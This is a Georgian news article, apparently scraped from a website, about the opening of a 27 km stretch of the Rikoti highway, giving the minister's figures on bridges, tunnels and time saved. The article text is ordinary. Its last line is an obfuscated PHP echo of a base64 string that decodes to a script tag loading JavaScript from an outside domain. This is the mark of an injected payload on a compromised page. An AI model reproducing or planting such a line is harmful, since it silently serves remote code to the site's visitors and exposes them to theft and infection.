celsiusi
ავერსი საქკაბელი

 ავტოტრანსპორტისთვის გაიხსნება რიკოთის უღელტეხილზე გამავალი მაგისტრალური, 4-ზოლიანი გზის 27 კილომეტრი. ეს ნამდვილად დიდი წარმატებაა, რომელიც იმსახურებს აღნიშვნას, – ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ აღმოსავლეთ-დასავლეთის საერთაშორისო მაგისტრალური გზის (E60-ის) შემადგენელი რიკოთის ჩქაროსნული მაგისტრალის 27 კმ-იან მონაკვეთის გახსნის ღონისძიებაზე განაცხადა.

როგორც მინისტრმა აღნიშნა, ხევი-შორაპნის 27 კმ-იანი მონაკვეთი რელიეფურად ყველაზე რთული მონაკვეთია, რაზეც ხელოვნური ნაგებობების-გვირაბებისა და ხიდების რაოდენობა მეტყველებს.

მისივე თქმით, ახალი მონაკვეთი მოიცავს 65 ხიდსა და 38 გვირაბს, რაც იმას ნიშნავს, რომ ამ მონაკვეთზე აშენებულია რიკოთის მთლიანი პროექტით გათვალისწინებული გვირაბების 75% და ხიდების 67%.

„ახალ 27-კმ-იან მონაკვეთზე, კერძოდ უბისაში, არის საქართველოში ყველაზე გრძელი –  1 362 მეტრის ხიდი. ამ ხიდის აშენებამდე ყველაზე გრძელი ხიდი ქვეყანაში ქობულეთის შემოვლით გზაზე იყო, რომლის სიგრძე 1 100 მეტრია. აღსანიშნავია ახალ მონაკვეთზე აშენებული გვირაბებიდან ყველაზე გრძელი გვირაბის სიგრძეც, რომელიც 1 640 მეტრია. რაც შეეხება სარგებელს, რომელიც მანძილს და დროს უკავშირდება, აქაც მნიშვნელოვანი შედეგი გვაქვს. სწორედ ახალი მაგისტრალური გზის 27 კმ-იანი მონაკვეთით 8 კმ-ით შემცირდა ძველი ხევი-შორაპნის საგზაო მონაკვეთი. რაც შეეხება დაზოგილ დროს, ახალი მონაკვეთის დასაშვები სიჩქარით გავლას, 45 წუთის ნაცვლად 20 წუთში შეძლებთ.

რიკოთის მასშტაბი მოსამზადებელი და საპროექტო სამუშაოებიდანაც იგრძნობოდა, მასში ჩართული იყვნენ ცნობილი და დიდი გამოცდილების მქონე საერთაშორისო საპროექტო კომპანიები. მხოლოდ გზის პროექტირებაზე 140-მა უცხოელმა და ქართველმა კვალიფიციურმა სპეციალისტმა იმუშავა, მშენებლობის ყოველდღიურ ზედამხედველობას კი, 146 სპეციალისტი უზრუნველყოფდა“, – განაცხადა ირაკლი ქარსელაძემ.

მისივე თქმით, გრძელდება ინტენსიური სამუშაოები რიკოთის დარჩენილ მონაკვეთებზე, პროექტი  2024 წელს დასრულდება.

„საერთო ჯამში, რიკოთის მაგისტრალურ გზაზე აშენდება 51 გვირაბი, რომლის ჯამური სიგრძე 33.6 კმ იქნება და 97 ხიდი, რომლის ჯამური სიგრძე 21 კმ-ზე მეტია. ამ დროისათვის, უკვე გაჭრილია 48 გვირაბი და აშენებულია 83 ხიდი.  რიკოთის მაგისტრალური გზის პროექტის დასრულების შემდეგ, მთლიანად რიკოთის უღელტეხილის გავლას, ერთ საათისა და 10 წუთის ნაცვლად, 35 წუთში იქნება შესაძლებელი“, – აღნიშნა მინისტრმა.

318
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");